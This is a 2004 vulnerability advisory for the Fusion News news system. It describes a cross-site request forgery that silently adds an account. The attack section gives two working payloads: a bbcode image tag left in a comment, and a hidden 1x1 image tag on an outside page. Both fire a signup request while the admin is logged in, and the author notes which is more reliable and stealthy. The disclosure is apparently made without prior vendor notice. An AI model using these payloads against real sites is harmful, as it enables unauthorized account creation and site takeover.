-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product: Fusion News vendor: FusionPHP (fusionphp.net) Affected Versions: 3.6.1 and lower Description: A widely used news management system Vulnerabilities: Unauthorized Account Addition Vulnerability Date: July 29, 2004 Vuln Finder: r3d5pik3 (me) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 1.) About 2.) Unauthorized Account Addition 3.) Vendor Notice -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (o_O)oOoOoOo [ About ] oOoOoOo(O_o) Ok this is basicly all due to the vendor being really lazy and not SUFFEICENTLY patching the previous similar exploit. Basicly all the vendor did to stop the last vulnrability was make it so you had to be signd on as an admin to creat an account, and that is simply just not enough. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (o_O)oOoOoOo [ Unauthorized Account Addition ] oOoOoOo(O_o) Unlike the previous related vulnrability this one you cant simply type something into the url bar and press enter. All you have to do is make sure the admin is logged on then do one of the following. (the first is probably the most reliable for an attacker) 1.)Leave them a comment with an [img] bbcode set like this [img]http://vulnrable.com/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@xxxxxxxxx&password=password&icon=&le=3&timeoffset=1[/img] 2.)As long as the admin has RECENTLY logged on you could exploit it remotely. By convincing him to go to a site that has a malicious <img> tag such as the following <img src="http://free.hostultra.com/~negativebliss/phpfusion/index.php?id=signup&username=teh-r3d-1&email=r3d_5pik3@xxxxxxxxx&password=password&icon=&le=3&timeoffset=1"; size="1" width="1"> That would make a 1x1 pixel image meaning the admin wouldnt even know what happend. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o) Give me 5 seconds to press the send button to the vendor ;) -r3d5pik3 (o_O)oOoOoOo [ ph33r t3h r3d 1z !!! ] oOoOoOo(O_o)
